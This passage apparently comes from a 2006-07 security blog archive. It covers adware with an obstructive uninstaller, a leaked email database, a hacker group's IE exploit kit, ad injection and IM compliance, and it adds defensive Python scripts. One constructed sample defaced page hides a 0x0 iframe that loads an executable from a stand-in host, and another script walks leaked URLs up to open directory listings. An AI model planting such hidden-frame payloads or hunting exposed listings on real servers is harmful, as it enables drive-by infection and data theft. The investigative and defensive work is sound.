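# containing at least one digit. It is deliberately loose (kernel32.dll matches),
# which is why it is only applied to entries that are ALREADY missing from the API view.
RANDOM_NAME = re.compile(r"^(?=[a-z0-9]*\d)[a-z0-9]{6,12}\.(exe|dll|dat|sys)$")


def cross_view_diff(api_view, raw_view):
    """Entries present in the raw view but absent from the API view (hidden), plus
    entries visible in both whose sizes disagree (a hook lying about size)."""
    hidden = sorted(set(raw_view) - set(api_view))
    size_mismatch = sorted(
        name for name in api_view if name in raw_view and api_view[name] != raw_view[name]
    )
    return hidden, size_mismatch


def triage(hidden):
    """Rank hidden entries, highest score first. A random-looking .exe with a
    hidden .dat of the same stem mirrors the [RANDOM].exe / [RANDOM].dat pattern."""
    findings = []
    for name in hidden:
        score = 1                              # hidden at all is already suspicious
        if RANDOM_NAME.match(name.lower()):
            score += 2
        stem = name.rsplit(".", 1)[0]
        if name.lower().endswith(".exe") and f"{stem}.dat" in hidden:
            score += 1
        findings.append((score, name))
    return sorted(findings, reverse=True)


if __name__ == "__main__":
    hidden, mismatch = cross_view_diff(API_VIEW, RAW_VIEW)
    for score, name in triage(hidden):
        print(f"score={score} hidden={name}")
    print("size mismatches:", mismatch)
```

The benign `ntoskrnl.exe` discrepancy is there on purpose: cross-view diffs always need triage, because a listing race or a truncated enumeration produces the same raw-only entry that a rootkit does, so a scanner ranks rather than simply lists.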

At this point, I bet you're dying to see the program in action, right? Exactly how does Messenger Skinner operate in the context of the MSN Chat system? Well, the answer is faintly interesting:

http://blog.spywareguide.com/upload/2007/09/skinner11-thumb.jpg

.....check it out, it almost totally hides the adverts served up by MSN! I wonder if they'd be happy knowing this product did that? I guess we'd better move onto the uninstaller that time forgot. In the rather general "terms and conditions" available from accessing the program via the Start menu, right at the bottom, is this:

"UNINSTALL
This software is completely free as it is subsidized by the Favorit contextual advertising component.

The end user can uninstall our component by filling the following form:
http://www.pc-on-internet.com/uninstall
"

.....oh dear. I'm sort of surprised anyone still releases applications like this - especially as it all smacks of hoop jumping and leaves a faint impression that they don't actually want you to uninstall any of these things. For a perfect example of what I mean, check out this writeup from 2005 where I battled with the uninstaller for Direct Revenue's Aurora.

Let's all pause while you read that and say a few brief words for Aurora.

What's that? Nobody got anything good to say about it? Nah, didn't think so. Anyway....let's go over how I think uninstalling a program should go.

1) Decide to uninstall.
2) Run uninstaller.
3) The end.

Now let's see how it goes down in Messenger Skinner Land, or as I like to call it, "Hoop Jump City Central" (like Nutbush City Limits, but with a better beat).

The Main Uninstall Page:

http://blog.spywareguide.com/upload/2007/09/skinner7-thumb.jpg

The Terms and Conditions Page:

http://blog.spywareguide.com/upload/2007/09/skinner8-thumb.jpg

The Privacy Policy Page:

http://blog.spywareguide.com/upload/2007/09/skinner9-thumb.jpg

....WHAAAAAAAAAAAAAAA?

That's right, to uninstall the program, they insist that you open up THREE DIFFERENT PAGES and read through endless reams of text - just to uninstall something!

Not only that, but then you have to hand over your Email address to contact them, tell them why you don't want it on your system anymore and (finally) "wait for someone to look into it" and then, finally, presumably, hopefully, send you the link to the uninstaller.

http://blog.spywareguide.com/upload/2007/09/skinner17-thumb.jpg

But wait, it gets BETTER. Can you believe it? Look what awaits you in the mailbox:

skinner18.jpg

Absolutely incredible. You're stuck with a 24 hour limit to obtain the uninstall program. If your Internet connection breaks, or you weren't planning on sitting in front of your PC all day waiting for their all-important Email - too bad! Furthermore, they have such iron-clad faith in their uninstaller program that if you run it more than three times, you see this:

http://blog.spywareguide.com/upload/2007/09/promo_expired-thumb.JPG

Even better, both Panda and Prevx flag the uninstaller as suspicious:

skinner19.jpg

And even better than that, there are some people out there complaining that the uninstaller doesn't actually seem to be very good at, er, uninstalling things.

Ladies and Gentlemen, I give you the epitome of "complete disaster". Without a doubt, this is one of the worst uninstall routines I've seen in years, and you can put that on a wall and frame it.

Finally, there are a bunch of domains on the server hosting Messenger Skinner that are related to the parent company. Of particular interest is one called crazygirls-world.com (registered to the same guy as Messenger Skinner), which leads you to....

http://blog.spywareguide.com/upload/2007/09/skinner20-thumb.jpg

.....Dialer-related porn on a site called "gad-network.com". Of course, it's no surprise that Gad-Network leads us back to the Favorit Network site.

.....wait, didn't I get a really amazing uninstaller from there once?
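The last step above, tying the Messenger Skinner server to crazygirls-world.com and Gad-Network through a shared host and a shared registrant, is a pivot that is worth automating once the domain count climbs. The script below is an added example and not the tooling used for this investigation; its records are constructed stand-ins for reverse-IP and WHOIS output, with invented domains, documentation-range addresses and made-up contacts rather than the real sites named in the post.

```python
"""Grouping domains that share a hosting IP or a registrant contact.

Added example. RECORDS is CONSTRUCTED: the domains, IPs and contacts are
invented and stand in for reverse-IP lookups and WHOIS records.
"""
from collections import defaultdict

RECORDS = [
    # (domain, hosting IP, registrant contact)
    ("skinner.example",           "198.51.100.10", "admin@skinner.example"),
    ("uninstall-form.example",    "198.51.100.10", "admin@skinner.example"),
    ("girls-world.example",       "198.51.100.11", "admin@skinner.example"),
    ("gad-net.example",           "198.51.100.11", "billing@gad-net.example"),
    ("dialer-portal.example",     "203.0.113.7",   "billing@gad-net.example"),
    ("shared-host-other.example", "198.51.100.10", "someone@else.example"),
    ("unrelated-shop.example",    "192.0.2.44",    "owner@unrelated-shop.example"),
]
FIELD = {"ip": 1, "registrant": 2}   # which tuple slot each pivot reads


class DisjointSet:
    """Union-find over domain names: two domains end up in one set when they
    share any pivot value, directly or through a chain of other domains."""
    def __init__(self):
        self.parent = {}

    def find(self, x):
        self.parent.setdefault(x, x)
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]   # path halving
            x = self.parent[x]
        return x

    def union(self, a, b):
        self.parent[self.find(a)] = self.find(b)


def cluster(records, seed, pivots=("ip", "registrant")):
    """Domains reachable from `seed` through shared values of the chosen pivots."""
    ds = DisjointSet()
    by_value = defaultdict(list)
    for rec in records:
        ds.find(rec[0])                       # register even isolated domains
        for p in pivots:
            by_value[(p, rec[FIELD[p]])].append(rec[0])
    for domains in by_value.values():
        for d in domains[1:]:
            ds.union(domains[0], d)
    root = ds.find(seed)
    return sorted(rec[0] for rec in records if ds.find(rec[0]) == root)


def evidence(records, members, pivots=("ip", "registrant")):
    """Why the cluster holds together: each pivot value shared by 2+ members,
    mapped to the members that share it."""
    shared = defaultdict(list)
    for rec in records:
        if rec[0] in members:
            for p in pivots:
                shared[(p, rec[FIELD[p]])].append(rec[0])
    return {k: sorted(v) for k, v in shared.items() if len(v) > 1}


if __name__ == "__main__":
    for pivots in (("registrant",), ("ip", "registrant")):
        members = cluster(RECORDS, "skinner.example", pivots)
        print(pivots, "->", members)
        for key, doms in evidence(RECORDS, members, pivots).items():
            print("   shared", key, doms)
```

Running it with both pivots pulls in `shared-host-other.example` purely because it sits on the same IP, which is the usual false positive on shared hosting; the registrant-only cluster is the tighter set. In practice you weight the pivots (registrant, name servers and WHOIS dates over bare IP) or drop IPs that host many unrelated registrants before trusting the IP edge.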

Research Summary Write-Up: Chris Boyd, Director of Malware Research
Technical Research: Chris Mannon, FSL Senior Threat Researcher
Additional Research: Peter Jayaraj, FSL Senior Threat Researcher

Sometimes, it's impossible to know where an investigation will take you. And though your initial focus might change somewhat, every now and again the focus will change so dramatically that what you end up with is nothing like what you were expecting.

This is one of those occasions.

A few days back, someone posted a link on the Spywarewarrior.com forum, asking if it was a "list of hijacked Emails". It definitely looked suspicious, so with that, off I went to have a look around.

http://blog.spywareguide.com/upload/2007/09/spbl6-thumb.jpg

....okay, hundreds of Email addresses with names and no other information provided. Not a lot to go on. However, a quick jump back up to the parent directory and....

http://blog.spywareguide.com/upload/2007/09/spbl1-thumb.jpg

Eight sets of files containing thousands upon thousands of Email Addresses.
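That "jump back" is the single most productive move when a leaked link points at one file on a server with directory listing left on: strip the path one component at a time and see which ancestors serve an auto-generated index. The script below is an added example, not the tooling used for this post; the leaked URL and the Apache-style listing in it are constructed samples (the host does not exist, nothing is fetched), and the entry names only echo the folder names seen in the screenshots.

```python
"""Walk a leaked URL back to its parent directories and recognise an
auto-generated 'Index of' page.

Added example. LEAKED_URL and SAMPLE_INDEX are CONSTRUCTED; no network access.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit, urlunsplit

DATA_EXT = (".txt", ".csv", ".sql", ".xls", ".mdb", ".log")   # bulk-data file types worth a look


def parent_urls(url):
    """Ancestor directory URLs of `url`, nearest first, ending at the site root."""
    parts = urlsplit(url)
    segments = [s for s in parts.path.split("/") if s]
    out = []
    # drop the file itself, then peel one directory per step
    for depth in range(len(segments) - 1, -1, -1):
        path = "/" + "/".join(segments[:depth]) + ("/" if depth else "")
        out.append(urlunsplit((parts.scheme, parts.netloc, path, "", "")))
    return out


class AutoIndex(HTMLParser):
    """Collects entries from an Apache/nginx index page. Skips the parent link
    (absolute or ../) and the column-sort links (?C=N;O=D and friends)."""
    def __init__(self):
        super().__init__()
        self.in_title = False
        self.title = ""
        self.entries = []

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self.in_title = True
        elif tag == "a":
            href = dict(attrs).get("href") or ""
            if href and not href.startswith(("?", "/", "../")):
                self.entries.append(href)

    def handle_endtag(self, tag):
        if tag == "title":
            self.in_title = False

    def handle_data(self, data):
        if self.in_title:
            self.title += data


def triage_listing(html):
    """Is this an auto-index, and if so what does it expose?"""
    p = AutoIndex()
    p.feed(html)
    is_index = p.title.strip().lower().startswith("index of")
    subdirs = sorted(e for e in p.entries if e.endswith("/"))
    data_files = sorted(e for e in p.entries if e.lower().endswith(DATA_EXT))
    other = sorted(set(p.entries) - set(subdirs) - set(data_files))
    return {"is_index": is_index, "subdirs": subdirs,
            "data_files": data_files, "other": other}


# CONSTRUCTED leaked URL and the listing its parent directory might return.
LEAKED_URL = "http://example.invalid/data/lists/list6.txt"
SAMPLE_INDEX = """<html><head><title>Index of /data/lists</title></head><body>
<h1>Index of /data/lists</h1><pre>
<a href="?C=N;O=D">Name</a> <a href="?C=M;O=A">Last modified</a>
<a href="/data/">Parent Directory</a>
<a href="hacked%20pages/">hacked pages/</a>   2007-07-14 02:11   -
<a href="ip%20scan/">ip scan/</a>             2007-07-20 19:02   -
<a href="list1.txt">list1.txt</a>             2007-09-03 11:20   812K
<a href="list2.txt">list2.txt</a>             2007-09-03 11:20   790K
<a href="readme.htm">readme.htm</a>           2007-06-01 08:45   2K
</pre></body></html>"""

if __name__ == "__main__":
    for u in parent_urls(LEAKED_URL):
        print("would check:", u)
    print(triage_listing(SAMPLE_INDEX))
```

The title check is what separates a real auto-index from a page that merely contains links; servers with `Options -Indexes` return a 403 on the directory URL instead, which is the outcome you hope for when it is your own server being checked.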

Not just Email addresses, either. Depending on the document opened, you might find yourself looking at a collection of Email addresses, full name, postal address, IP address and the time / date they submitted their form / mail to whatever website they happened to be on at the time (yes, the websites were listed too). Though we've blanked a lot out, the following screenshot will still give you an idea of how much data is up for grabs (note the scrollbar at the side of the screen is only halfway through this particular page):

http://blog.spywareguide.com/upload/2007/09/spbl8-thumb.jpg

...ouch?

The majority of the websites listed are down, but you can probably guess the content - possible prizes in exchange for your Mail Address (and possibly other information) being used in opt-in databases for "promotional purposes", anyone? Yeah, I'd think that was a good bet. There's nothing wrong with genuine opt-in....but something has gone seriously wrong here, and the potential for things to get out of hand very quickly will soon be seen.

Googling one of the domains flagged up an interesting thread on a popular Adult Webmaster forum, gfy.com:

http://blog.spywareguide.com/upload/2007/09/spbl115-thumb.jpg

Quote time:

"What I am offering is 150-200k Daily Emails - 4-6 Mil Unique Monthly Emails
Full Data Included. name,email,address,ip,time,date,source etc

Price is 2.5k Monthly and we also accept Weekly payments as well"

Now, at this point, everything is likely to be legit; everyone has opted in; the data is only going to be sold to "a maximum of three people".

The problem is, once you submit your details to anything online, it doesn't take long for that information to wind up in all sorts of strange places you couldn't possibly have imagined (the seller probably didn't see this coming, either). Over the course of a year or two....wow. As proof of this "wow", check out the below shot taken from another directory of the website we were looking at earlier:

http://blog.spywareguide.com/upload/2007/09/spbl114-thumb.jpg

....."hacked pages"? "IP Scan"? "IE Exploit"? I'd hate to be the Master of the Obvious and claim my Spidey Sense is tingling, but let's have a look at some of the items in the folders. Kicking things off with "Hacked pages", we immediately discover some cool and funky things about our targets:

http://blog.spywareguide.com/upload/2007/09/spbl4-thumb.jpg

Ah! Viva la Group Louz O MNIN Ndouz Room Pal! (Or was it "Le"? I never was fantastic with French). I guess at this point you'll be wanting to see an example of their handiwork, right? Oh, okay then. Here's a hacked page of theirs from sometime around July:

http://blog.spywareguide.com/upload/2007/09/spbl111-thumb.jpg

....yeah, that's not the most dazzling hacked page ever, is it? Kids just don't put the effort in these days. However, things are about to get a little more interesting (because one solitary page hacked does not a leet hax0r make). Let's take a look at the "IE Exploiter", because this is the unexpected gold that sends this entire investigation somewhere else entirely:

spbl10.jpg


spbl11.jpg

Running the tool creates a page of HTML and deposits it on your desktop. That HTML mentions a file called "Bl4ck". Haven't I seen that somewhere before?

Yep, right here in August 2006.

http://blog.spywareguide.com/upload/2007/09/bl4ck2-thumb.jpg

Put simply, you run the tool, generate your HTML and edit it (swapping in your own EXE as appropriate, or sticking with the "Bl4ck" file, and keeping the optional .WAV file too!); the core of this attack appears to be this exploit. For those interested, the default hacked page will look like this:

http://blog.spywareguide.com/upload/2007/09/spbl24-thumb.jpg

...plain, but it gets the job done I suppose. Because you can use whatever EXE you want with this thing, there's plenty of potential for Internet badness. Here's a forum post complaining of the same exploit in October 2006 - it seems the file in that instance tries to send Spam mail. Now we can see why the guy with the Email lists would want to keep hold of a tool like that. Here's another example of a banking trojan being dropped in the same way.
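Whatever the exploit behind the kit turns out to be, the generated page has to point at the EXE somewhere, and that is the cheapest thing to triage on a defaced site before anyone opens it in a browser. The scanner below is an added example and not the IE Exploiter tool's own output; `SAMPLE_PAGE` is constructed to mimic the shape of page described above (an executable named after the post's "Bl4ck" file, a .wav beside it, a frame the visitor cannot see) and is not the real generated page, and the hosts in it do not exist. It reports what the page references and does not attempt to reproduce how the executable would be launched.

```python
"""Static triage of a 'hacked page': executables referenced, hidden frames,
and off-site hosts the page would contact.

Added example. SAMPLE_PAGE is CONSTRUCTED, not the kit's real output.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

EXECUTABLE_EXT = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".hta")
URL_ATTRS = ("src", "href", "data", "codebase", "action", "background")
SKIP_SCHEMES = ("javascript:", "#", "mailto:", "about:")


class RefCollector(HTMLParser):
    def __init__(self, base):
        super().__init__()
        self.base = base
        self.refs = []           # (tag, attribute, absolute URL)
        self.hidden_frames = []  # URLs loaded in frames sized or styled out of view

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        candidates = [(attr, a[attr]) for attr in URL_ATTRS if attr in a]
        if tag == "param" and "value" in a:          # <param name="movie" value="...">
            candidates.append(("value", a["value"]))
        for attr, val in candidates:
            val = val.strip()
            if val and not val.lower().startswith(SKIP_SCHEMES):
                self.refs.append((tag, attr, urljoin(self.base, val)))
        if tag in ("iframe", "frame"):
            style = a.get("style", "").replace(" ", "").lower()
            tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            if tiny or "display:none" in style or "visibility:hidden" in style:
                self.hidden_frames.append(urljoin(self.base, a.get("src", "")))


def scan(html, base="http://example.invalid/"):
    """Summarise what the page points at. `base` resolves relative references."""
    p = RefCollector(base)
    p.feed(html)
    executables = [r for r in p.refs
                   if urlsplit(r[2]).path.lower().endswith(EXECUTABLE_EXT)]
    offsite = sorted({urlsplit(r[2]).netloc for r in p.refs} - {urlsplit(base).netloc})
    return {"executables": executables, "hidden_frames": p.hidden_frames,
            "offsite_hosts": offsite}


# CONSTRUCTED page in the style described: black background, a sound file,
# an executable referenced three different ways, one of them from a 0x0 frame.
SAMPLE_PAGE = """<html><head><title>hacked</title></head>
<body bgcolor="black"><center><font color="red">Owned</font></center>
<embed src="sound.wav" autostart="true" hidden="true">
<iframe src="http://dl.example.invalid/Bl4ck.exe" width="0" height="0"></iframe>
<object data="Bl4ck.exe"><param name="movie" value="Bl4ck.exe"></object>
<a href="mailto:greetz@example.invalid">greetz</a>
</body></html>"""

if __name__ == "__main__":
    report = scan(SAMPLE_PAGE)
    for tag, attr, url in report["executables"]:
        print(f"executable via <{tag} {attr}>: {url}")
    print("hidden frames:", report["hidden_frames"])
    print("off-site hosts:", report["offsite_hosts"])
```

Run it over a saved copy of the defaced page (with `base` set to the page's real URL so relative paths resolve) and you get the list of binaries to pull for analysis and the hosts to watch in proxy logs, without ever rendering the page.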

But wait, we're not done yet. I recognise some of those usernames listed on the IE Exploiter tool. A few of them tied in directly with the investigations into the Q8 Army hacks from 2005/06. IM Rootkits, fake BitTorrent clients and Mr Bean videos being pushed via the BitTorrent installs (no, we never found out what the deal was with Mr Bean).

Focus on Sniper_SA, mentioned in the "Greetz" section of the program. He's responsible for the hack above featuring The Terminator (in that case, pushing the default "Bl4ck" file) but a lot more website hacks besides. Check these out:

http://blog.spywareguide.com/upload/2007/09/sahax1-thumb.jpg
http://blog.spywareguide.com/upload/2007/09/sahax2-thumb.jpg
http://blog.spywareguide.com/upload/2007/09/sahax3-thumb.jpg

A lot of digging around later, and I finally stumble across this website (note the fake MSN Chatbox window in the bottom left hand corner - top tip, never click these):

http://blog.spywareguide.com/upload/2007/09/sahax4-thumb.jpg

From there, it's only a quick jump over to Sniper's forum:

http://blog.spywareguide.com/upload/2007/09/sahax5-thumb.jpg

On the main page, there's a huge list of members - many of whom are either well known for their hacking exploits or (again) had their usernames come up repeatedly during the Q8 Army investigation. Here's a small selection:

http://blog.spywareguide.com/upload/2007/09/sahax9-thumb.jpg

....that's a pretty big collection of leet hax0rs. After wading through those for a while, I eventually came across someone posting on a number of forums who would post up hacks, cracks, virus writing techniques and more besides....the majority of the posts always giving the Email address of the IE Exploiter tool creator in his examples. It's a fairly safe bet they're one and the same person, but what really broke my brain was his avatar:

http://blog.spywareguide.com/upload/2007/09/sahax10-thumb.jpg

....Please, tell me you see it too.

Research Summary Write-Up: Chris Boyd, Director of Malware Research
Additional Research: Peter Jayaraj, FSL Threat Researcher

Our CEO, Kailash Ambwani, talks about the greynets concept and how the majority of Internet traffic has evolved from HTTP to communicative application traffic. Ambwani discusses how enterprises are adopting greynets, how this increases security liabilities, and how FaceTime security products enable and secure greynets. Remember, FaceTime is about enabling and controlling these innovations inside the enterprise. Why? Because customers are demanding to communicate this way, and often an organization's most sophisticated users, the forward thinkers and innovators, will bring them into the network because they realize their value, but sometimes forget about the security and regulatory risks involved.

Here is part one, and I would note to pay particular attention to how anonymizers like Rodi and / or Tor can be used to bypass typical forms of defense. Naturally, and Kailash acknowledges this, products like Tor (originally a US Naval Research Laboratory project, later funded by the EFF) can be used as anti-censorship tools, especially in countries where censorship is a problem.

However, they can be a disaster, a potential legal nightmare for large enterprises and I.T. administrators to manage. Kailash goes on to note how malware is now profit driven. In his limited time he didn't get to explore the use of widgets (often thin Ajax clients) or the stripping of content using browser-powered tools, which allows the propagation of content like video across the enterprise. This can also be problematic given attacks like the Windows Metafile (WMF) exploits or exposure to inappropriate content.

In part two Kailash goes on to discuss how Facetime addresses the issues. Once again the focus is on enablement and control. The Internet is changing and we all must change with it.


In Internet News Week our V.P. of Marketing, Frank Cabri, makes a notable quote along the lines of our usual rapier-wit-wielding MVP, Chris Boyd (e.g. describing IM safety as that "Ben Stiller and Circle of Trust kind of thing").

"Some organizations' ears are ringing from this consumerization of an IT trend and the fact that employees are bringing in unsanctioned applications through the back door," Cabri said. "Organizations are hearing about it from us, from some of the industry analysts, and in many cases, seeing it first hand on their networks."

And yet there are still many that aren't aware of the issue, and usage continues to grow. The recent Mark Foley case in the U.S. Congress, in which Instant Messaging was used to send inappropriate messages to a teenage congressional page, is a case in point.

"Sometimes it takes a Mark Foley-like situation to happen in your own organization to raise awareness of the risk and the impact," Cabri noted. "Obviously, our goal is to help customers before this happens."

"Lets face it, no business wants to get 'Foley'ed' on a national level -- the business consequences of this could be extremely negative."

Ouch - "Foley'ed" - apt coinage indeed. Frank is, of course, referring to the Mark Foley scandal that recently emerged around IM.

Learn More: See a brief video of Kailash Ambwani, our CEO at FaceTime Communications, as he covers why words like "guarantee" and "rumor", or incidents like the Mark Foley scandal and failing to monitor IM (or other greynets), can lead to big problems, especially if you are a big company.

This cascade of events is one of the drivers that is forcing big companies to take a hard look at their corporate policies, especially with regulatory challenges like:

- Gramm-Leach-Bliley Financial Modernization Act (GLBA)

- Sarbanes-Oxley Act of 2002 (SOX)

- Health Insurance Portability and Accountability Act of 1996 (HIPAA)

Will the Foley Force raise awareness of the issues? Good question, and more pertinent than ever now that December 1st approaches. What is the big deal about December 1st? It is "E-discovery Day", when things could get more tedious and potentially more costly for enterprises that are not prepared.

E-discovery refers to finding and producing documents stored in electronic form in response to litigation or regulatory requirements. Civil litigants, regulators and criminal prosecutors now ask, as a matter of course, for copies of selected e-mail communications or make broad requests for all electronic records. After Dec. 1, changes to the Federal Rules of Civil Procedure take effect that make e-discovery a standard part of federal proceedings.

So where can you start if you are a large enterprise? First, figure out how much instant messaging traffic is going on in your network; you might be surprised not only by the traffic, but by the other insidious malware that rides along with it. FaceTime has a free tool called RTMonitor that can help with this, or you can contact them for a demo.

Best Practices for Emerging Compliance Challenges: Electronic Messaging and Communications (ReymannGroup):

Download the IM Compliance and Regulations document [PDF]. This paper is a great primer on what you need to know.

Some might be wondering... just what is Instant Messaging (IM)? We use it every day, and it has been around for a decade, but because of its ephemeral nature we tend to treat it differently. I consulted Archive.org for some background...

Instant Messaging (IM) is an electronic messaging service that allows users to determine whether a certain party is connected to the messaging system at the same time. IM allows them to exchange text messages with connected parties in real time.

To use the service, users must have IM client software installed on their workstations. While there are many types of IM clients, they all tend to function in a similar manner. Client software may either be part of an agency's IT network and available to only registered users, or be public and available to anyone on the Internet. The client software logs into a central server to create connections with other clients logged in at that same time. Users create and exchange messages through their local client application.

Other important points:

* In addition to sending messages, users may have the ability to attach and exchange electronic files such as images, audio, video, and textual documents. This capability depends on the configuration of the individual client software as well as on protocols established at the client server.

* Depending on the software, users who are online may have the ability to respond to messages.

* Users may also block other users with whom they do not want to exchange messages.

* Users may only communicate with others using the same or a compatible client software.

How does IM differ from email?

Fundamentally, the difference between IM and email is the notion of presence. This means that users of the IM system are aware that other users have logged in and are willing to accept messages. Unlike email, IM content can only be sent to users who are logged in to the system and accepting messages. If users are not logged in, others do not have the ability to send them messages.

Because IM is not predicated upon an open standard, there is no uniformity regarding message transmission and structure.

Remember, Instant Messaging will be treated like e-mail: IM, despite its ephemeral or fleeting nature, is a document, and a document that should be factored into your archive equation if you want to cover the bases soundly and not get "Foley'ed"... let's go back to Archive.org...

Does IM content qualify as a Federal Record?

The statutory definition of records (44 U.S.C. 3301) includes all machine readable materials made or received by an agency of the United States Government under Federal law or in connection with the transaction of public business. Agencies that allow IM traffic on their networks must recognize that such content may be a Federal record under that definition and must manage the records accordingly. The ephemeral nature of IM heightens the need for users to be aware that they may be creating records using this application, and to properly manage and preserve record content. Agency records management staff determine the record status of the IM content based on the overall records management policies and practices of their agency.

I think that in light of the recent scandal (and how many don't we know about...) we will probably see agencies taking a new look at their IM practices; it is potentially too costly to ignore. This isn't the only scandal either. There are others, but they tend to centre on e-mail, so again, don't discount the ephemeral nature of IM. Take the "Boy's Club Case" as reported by Baselinemag.com:

Peratis wanted WestLB to search for e-mail and Bloomberg messages from mailboxes of 19 current and former equities executives, human-resources representatives, bank managers and others, using more than 170 terms. These ranged from Quinby's name and initials, to employment-related words like "fire" and "bonus," to derogatory sexual slang...

In this case I don't know if IM was enabled or factored into discovery. However, according to our recent studies, it often is enabled, whether or not IT is aware of it. Odds are that after the Foley case, e-mail will not be the only prime target for discovery, and discovery can be quite expensive to dig up if an enterprise is not prepared.

The Zango Double-dip ?

There have been a lot of articles and posts about Zango.  Most of them focus on the installation practices, lack of user notification and even how the company recently received a fine by the FTC.

This piece is not one of those.  Instead of talking about the Zango software, I would like to have a brief look together at the theoretical business model that drives Zango. 

Some relevant snippets from the Zango site:
Web publishers, content creators and providers aren't able to earn a living from their products. <Snip> online consumers have proven reluctant to pay a monthly subscription fee for access to online content and entertainment. <Snip> Zango has developed a unique solution to this economic dilemma. <Snip> With the Content Economy model, consumers are able to access and enjoy web content and entertainment for free, because when they search or browse online for products and services, they see ads from Zango advertisers. <Snip> Web publishers and content providers get paid by Zango for distributing their creative assets. Zango earns revenue from online advertisers, and thus, keeps this new Content Economy alive and thriving.
I see!  Visitors will never pay to see online content, so the content creators will never get to see a dime from their work.
So Zango's self-proclaimed raison d'etre is to provide these starving "long tail" creators/artists with some income so they can keep producing the content that everybody likes, instead of needing to beg for spare change at a mall entrance.

Surely, that's a noble cause, no?  Let's see...

Last month, a particular Instant Messaging attack was infecting users via Yahoo Instant Messenger and causing all kinds of problems. This month, we've discovered a variant that's linked to a sophisticated piece of possible clickfraud (depending on how you define it). We often hear about Botnets in relation to this kind of scam - indeed, a common tactic which we've seen a number of times is to hijack the infected drones' homepage and fill it full of clickable adverts that bring in a return for the Botnet owner. Here, we have an attacker going one step further and doing away with the complicated aspect of the Botnet altogether, substituting it for a more straightforward scheme involving the worm mentioned above as a launchpad. Effectively, we have a Botnet without bots, and the potential for financial fraud is in some ways more severe, because of the ease with which this particular attack spreads. First, let's take a look at the technical aspects of this attack...

Ben Edelman has some new spyware research about Vonage and some of the unsavory things going on. It is a long and technical read, but I recommend it (see the link to the video at the end, and the late entry on the Vonage behind-the-scenes action).

He covered several examples, but the one that caught my eye and I wanted to talk about was the use of ad injection.

Examples he covered in the article; the banner injection group is the one I'm interested in here.

Spyware-Delivered Pop-Up Ads
Direct Revenue
Targetsaver - covering AOL
Targetsaver - covering a sexually-explicit site
SearchingBooth

Banner Injection Into Others' Properties
Fullcontext - ad injected into Google.com
Searchingbooth - ad injected into True.com
Searchingbooth - ad injected into eBay
DollarRevenue - replacing an ad within Boston.com

Spyware Delivered Banner Farms
Hula's Global-Store
ExitExchange

Spyware Lead Acquisition
Direct Revenue - Vendare's Myphonebillsavings
Direct Revenue - NextClick's Phonebillsolution

It is worth noting that in the first three injection examples (Google, eBay and True.com) the ads are injected above the site.
However, DollarRevenue injects its ad into the site, covering a banner placed by the site. For a site this means the person who bought the media might not be getting their fair share and the site owner is not getting paid.

But what does this mean for people- netizens?

I was intrigued by this question and by what seems to be a relatively dead tactic coming back to life in the field. So I queried Ben for a discussion. In short, he wondered aloud whether banner injection might be "the next big thing." He told me that until this past month, he had only seen one spyware program injecting banner ads into others' sites: DeskWizz's SearchingBooth. But then this past month he found two more, FullContext and DollarRevenue. That's a startling and rapid growth, suggesting there may be more to come.

Ben also pointed out that these ad injectors benefit from the lack of transparency in banner ad syndication. At least affiliate merchants generally get to approve their partners one by one. (Most sophisticated merchants have long since disabled auto-approve.) But when advertisers buy banner ads, especially run-of-network / remnant / untargeted ads, they get very little visibility into where those ads appear. This is practically an invitation for placements in spyware injections and other unseemly locations.

In the past many users suspected they had spyware because of all the annoying pop-ups, but like the Borg the dark forces adapt and change tactics (smaller footprints, random file names and MD5s, using rootkits), so I am not surprised if this new tactic enters the fray. I can envision it popping up on social networks like MySpace or non-hierarchical news sites like Digg.

The ad injection is very subtle, and thus people may not know it is going on, or that a program is doing it.

Take, for instance, an "anti-fraud screen" I found while tracing the money trails of a mass spam attack (still looking into that one) that was delivering malware and porn through deceptive SEO and encoded JavaScript injection. In this case, as I understand it so far, a company from Russia runs a private pay-per-click engine and, I believe, offers XML feeds and search results powered by syndication from various pay-per-click search engines. They dole out 75% or more to webmasters and pocket the rest.



http://blog.spywareguide.com/upload/2006/07/7search-anti-fraud-thumb.gif

While it is good that 7Search periodically checks for problem syndication, I have to ask: why do you need the end user to police it? I would prefer that they keep the problems out at the gate.

What topic did you click? Straightforward enough, if you can remember. Why not log the topic?

Are you infected with spyware? How would they really know? That is how it got the moniker "spyware" in the first place: people didn't know how it got there, or someone else installed it, or any number of other situations.

Are you part of a pay-to-surf program? Name them. Ouch. It's not as if people getting paid are going to out anyone, or would they? It doesn't add up to me. Not to mention that incentivized search has historically given low yields for advertisers.

In closing, pay close attention to the video from Ben's research on the DollarRevenue ad injection. The easy-to-catch warning signs of spyware infection may indeed fade, meaning people will have to be all the more careful.

Watch the full video of what an ad injection looks like: Edelman's Video on Ad Injection.

LATE ENTRY: Using the ever-so-handy insider status in the ad world, I have learned from more than one anonymous source that Vonage is putting on hold a number of their advertising deals. I am not sure yet whether it is just with the companies Edelman cited in his research or how far this reaches. At any rate Vonage is reacting and getting serious in their response. This could be a pivotal moment in the spyware wars. You kill the spies by cutting out the well-funded brands sponsoring their existence.

The issue of Blogspot URLs being redirected and used for exploits has been noted before. In this particular case we follow the evolution of sophisticated mass spamming of Google's Blogspot service URLs, coupled with other search engine spam techniques and trace the cascade of events that follow.

Overview: The "Simple Scenario"

1) Party unknown figures out how to optimize Blogspot pages to achieve high rankings in MSN portal Search Engine Results Pages (SERPS) for popular terms known as keywords, in particular keywords around World Cup coverage.

2) This person uses Google's Blogspot hosting. It has been noted before that Blogspot hosting allows users to insert JavaScript into the head of the HTML page, creating a vulnerable environment.

3) Party unknown implements a complex server-side, auto-rotation system on a domain hosted elsewhere.

4) Party unknown accomplishes "cloaking" the Blogspot URLs, hiding the auto-rotation system. The pages rank high in many MSN search results for targeted keywords.

5) Users conducting queries on MSN or users who arrive on the tainted blogspot URLs are redirected to various pages. In this particular example some sites display explicit pornographic content in addition to offering software downloads with a documented history of security risk.

The World Cup

